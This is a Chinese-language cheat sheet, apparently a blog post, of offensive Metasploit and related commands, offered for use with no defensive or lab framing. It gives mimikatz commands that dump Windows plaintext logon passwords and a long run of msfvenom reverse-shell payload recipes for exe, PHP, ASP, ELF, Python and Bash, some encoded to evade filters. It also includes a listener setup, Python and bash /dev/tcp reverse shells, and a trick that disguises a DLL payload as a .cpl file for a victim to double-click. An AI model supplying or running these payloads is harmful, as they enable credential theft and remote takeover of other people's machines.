msf常用命令

msf常用命令

获取 Windows 明文用户名密码

git clone https://github.com/gentilkiwi/mimikatz.git

load mimikatz

privilege::debug

sekurlsa::logonPasswords full

 

 

Python shell

python -c "import pty;pty.spawn('/bin/bash')"

 

 

MSF Payloads

msfvenom -p windows/meterpreter/reverse_tcp LHOST= X > system.exe

msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=443 R > exploit.php

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -e -a x86 --platform win -f asp -o file.asp

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c

 

MSF 生成在 Linux 下反弹的 Meterpreter Shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=443 -e -f elf -a x86 --platform linux -o shell

 

MSF 生成反弹 Shell (C Shellcode)

msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c

 

MSF 生成反弹 Python Shell

msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py

 

MSF 生成反弹 ASP Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp -a x86 --platform win -o shell.asp

 

MSF 生成反弹 Bash Shell

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -o shell.sh

 

MSF 生成反弹 PHP Shell

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.php

 

MSF 生成反弹 Win Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -a x86 --platform win -o shell.exe

 

 

msf监听反弹

msf > use multi/handler

msf exploit(handler) > set PAYLOAD php/reverse_php

msf exploit(handler) > set LHOST 你的IP

msf exploit(handler) > set LPORT 反弹连接的端口

msf exploit(handler) > exploit

 

访问shell.php就会得到一个shell会话

 

 

PYTHON 反弹 Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“你的ip”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

 

nc反弹shell

肉鸡:

# bash -i >& /dev/tcp/反弹的ip/9999 0>&1

黑客机先监听:

# nc -vv -l -p 9999

得到shell会话

[root@xxx ~]# 

 

 

 

 

msfvenom命令行选项如下:

    Options:

        -p, --payload    payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定

        -l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all

        -n, --nopsled    length>        为payload预先指定一个NOP滑动长度

        -f, --format     format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)

     -e, --encoder    [encoder]       指定需要使用的encoder(编码器)

        -a, --arch       architecture>  指定payload的目标架构

            --platform   platform>      指定payload的目标平台

        -s, --space      length>        设定有效攻击荷载的最大长度

        -b, --bad-chars  list>          设定规避字符集,比如: '\x00\xff'

        -i, --iterations count>         指定payload的编码次数

        -c, --add-code   path>          指定一个附加的win32 shellcode文件

        -x, --template   path>          指定一个自定义的可执行文件作为模板

        -k, --keep                       保护模板程序的动作,注入的payload作为一个新的进程运行

            --payload-options            列举payload的标准选项

        -o, --out   path>               保存payload

        -v, --var-name name>            指定一个自定义的变量,以确定输出格式

        --shellest                   最小化生成payload

        -h, --help                       查看帮助选项

        --help-formats               查看msf支持的输出格式列表

 

 

 

CPL

其实cpl文件就是dll文件

只需要用msf生成一个dll的payload将名字改成xx.cpl 如果目标双击的话 即可成功getshell

payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.9 lport=4444 -f dll -o /tmp/test.cpl 

 

 

可执行文件后缀

Windows支持的可直接执行文件后缀有

exe pif com cmd scr (jar等需要安装三方软件包不在考虑中)

 

 

迁移会话到系统进程(如果迁移失败会失去会话,需要重新建立会话。迁移成功后,即使exit主动退出该会话,再次exploit还会自动获得反弹shell。但如果目标系统重启,还是会丢失会话):

你可能感兴趣的:(网络安全)